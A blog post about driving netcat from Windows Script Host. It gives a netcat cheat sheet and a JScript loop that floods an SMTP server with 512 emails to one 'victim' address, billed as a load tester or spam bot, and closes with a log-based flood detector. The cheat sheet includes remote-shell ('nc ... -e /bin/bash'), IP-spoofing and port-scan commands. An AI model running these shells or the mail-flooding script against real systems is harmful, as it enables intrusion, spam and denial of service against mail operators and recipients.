Email Load Tester / Auto Email Sender / Spam Bot - In JScript (or VBScript)

Netcat for Windows is phenomenally powerful when driven from Windows Scripting Host!

Netcat On Windows Background

Netcat is a very powerful, open source (GPL 2) network tool that comes originally from Unix. It is so powerful and easy to use that it has gained a bad reputation as a hacker tool. This is not what it was designed for, and indeed, many security professionals use it in the war against hackers.

To give you a flavour of what it can do, here is a list of some examples:

Description / Command

Connect to a port on a remote host:
    nc remote_host <port>

Connect to multiple ports on a remote host:
    nc remote_host <port>...<port>
    For example:
    nc www.somecompanyasanexample.com 21 25 80

Listen on a port for incoming connections:
    nc -v -l -p <port>

Connect to remote host and serve a bash shell:
    nc remote_ip <port> -e /bin/bash
    Note that Netcat does not support the -e flag by default. To make Netcat support the -e flag, it must be re-compiled with the -DGAPING_SECURITY_HOLE option.

Listen on a port and serve a bash shell upon connect:
    nc -v -l -p <port> -e /bin/bash
    Note that Netcat does not support the -e flag by default. To make Netcat support the -e flag, it must be re-compiled with the -DGAPING_SECURITY_HOLE option.

Port scan a remote host:
    nc -v -z remote_host <port>-<port>
    Use the -i flag to set a delay interval:
    nc -i <seconds> -v -z remote_host <port>-<port>

Pipe command output to a netcat request:
    <command> | nc remote_host <port>
    For example:
    echo "GET / HTTP/1.0
    [enter]
    [enter]
    "| nc www.somecompanyasanexample.com 80

Use source-routing to connect to a port on a remote host:
    nc -g <gateway> remote_host <port>
    Note: Up to eight hop points may be specified using the -g flag. Use the -G flag to specify the source-routing pointer.

Spoof source IP address:
    Use the -s flag to spoof the source IP address:
    nc -s spoofed_ip remote_host port
    This command will cause the remote host to respond back to the spoofed IP address. The -s flag can be used along with most of the commands presented in this table.

Transfer a file:
    On the server host:
    nc -v -l -p <port> < <file>
    On the client host:
    nc -v <server_host> <port> > <file>
    It is also possible for the client host to listen on a port in order to receive a file. To do this, run the following command on the client host:
    nc -v -l -p <port> > file
    And run the following command on the server host:
    nc -v <client_host> <port> < file

Exsead Email Sending

Now that we have seen how powerful netcat is, we can have a look at what we can do with it from scripts. I have already discussed interacting with web services using the XMLHTTP object. For sending email, there is no such ready-made object to help us. However, sending email is not an especially complex matter, so we can just use netcat instead!

To do this you will first require a copy of netcat. I have a copy that runs on Windows XP at http://www.nerds-central.com/CodeZips/nc111nt.zip. I did not do the port, but the credits are in the zip and it is GPL 2. Once you have nc.exe you will need to put it somewhere on the executable path (e.g. system32) or in the same directory in which you are going to run your script.

Below is a very simple example script. This should be run by cscript from the command prompt. You will have to change the address of the SMTP server to one to which you have access and set the to and from email addresses, hit count and inter-hit delay to appropriate settings. This is a real script; I used it today to load test an email server!

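// Netcat command line: verbose connection to the SMTP server on port 25.
var strExe = "nc -v smtp.myserver.co.uk 25";

var objShell = WScript.CreateObject("WScript.Shell");
var total  = 512;                 // hit count: number of messages to send
var delay  = 0;                   // inter-hit delay in milliseconds
var victim = "oops@example.com";  // recipient ("to") address

for(var i=0;i<total;++i)
{
    // Build the whole SMTP dialogue for one message up front.
    var strExeIn ="HELO nerds-central.com\r\n";
        strExeIn+="MAIL FROM: \r\n";
        strExeIn+="RCPT TO: <"+victim+">\r\n";
        strExeIn+="DATA\r\n";
        strExeIn+="Body of email: this is an auto generated test email.\r\n";
        strExeIn+="This is "+(i+1)+" of "+total+"\r\n";
        strExeIn+=".\r\n";
        strExeIn+="QUIT\r\n";

    // Start netcat, feed the dialogue to its standard input, then close
    // the stream so netcat sees end of input.
    var objScriptExec = objShell.Exec(strExe);
    objScriptExec.StdIn.write(strExeIn);
    objScriptExec.StdIn.close();
    WScript.echo("Sending "+(i+1)+" of "+total+" to "+victim);
    // Print the server's replies as captured from netcat's standard output.
    WScript.echo(objScriptExec.StdOut.ReadAll());
    WScript.sleep(delay);
}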

A word of warning!

This is a powerful script that is equally capable of bringing an email server to its knees or getting you thrown off the smtp server! Use with caution and DO NOT SPAM!
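
Seen from the mail server's side, a run of this script is one client delivering to one mailbox far faster than normal traffic. The following is an added example, not part of the original post: a sliding-window check over delivery log lines that flags that pattern. The log format, the function names (parseLine, findFloods, sampleLog), the addresses and the thresholds are all assumptions constructed for illustration.

```javascript
// Constructed log format (an assumption, not any real mail server's):
//   <ISO-8601 time> client=<ip> helo=<name> rcpt=<address>
function parseLine(line) {
  var m = /^(\S+) client=(\S+) helo=(\S+) rcpt=(\S+)$/.exec(line.trim());
  if (!m) return null;                      // skip lines in other formats
  var t = Date.parse(m[1]);
  if (isNaN(t)) return null;                // skip unparseable timestamps
  return { time: t / 1000, client: m[2], helo: m[3], rcpt: m[4].toLowerCase() };
}

// Flag every (client, recipient) pair that delivers more than `limit`
// messages inside any sliding window of `windowSec` seconds.
function findFloods(lines, limit, windowSec) {
  var recent = {};   // key -> timestamps still inside the window
  var flagged = {};  // key -> report entry
  var events = lines.map(parseLine).filter(Boolean)
                    .sort(function (a, b) { return a.time - b.time; });
  events.forEach(function (e) {
    var key = e.client + " " + e.rcpt;
    var q = recent[key] || (recent[key] = []);
    q.push(e.time);
    while (q[0] <= e.time - windowSec) q.shift();   // expire old entries
    if (q.length > limit) {
      var f = flagged[key] || (flagged[key] =
        { client: e.client, rcpt: e.rcpt, firstAlert: e.time, peak: 0 });
      if (q.length > f.peak) f.peak = q.length;
    }
  });
  return Object.keys(flagged).map(function (k) { return flagged[k]; });
}

// Constructed sample: one client sending 30 messages, one every 200 ms, to a
// single mailbox (a tight send loop with no delay), plus ordinary traffic.
function sampleLog() {
  var base = Date.parse("2024-01-01T12:00:00Z"), out = [];
  for (var i = 0; i < 30; i++) {
    out.push(new Date(base + i * 200).toISOString() +
      " client=203.0.113.7 helo=nerds-central.com rcpt=oops@example.com");
  }
  [0, 90, 400].forEach(function (s) {
    out.push(new Date(base + s * 1000).toISOString() +
      " client=198.51.100.20 helo=mail.example.org rcpt=staff@example.com");
  });
  out.push("malformed line that should be ignored");
  return out;
}

console.log(findFloods(sampleLog(), 10, 60));
```

The same counters can drive a per-client rate limit at the SMTP front end, so that a load test run against a production server is slowed down instead of taking it out.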

Doing more fancy stuff

Using the base64 encoder in the code repository (go to www.nerds-central.com and look at the scripts link on the right hand side) you can add support for attachments to the script. You could also make it pick up information on to whom to send the emails from a web service or database (via adodb). There are posts on all of these techniques hiding away in Nerds-Central!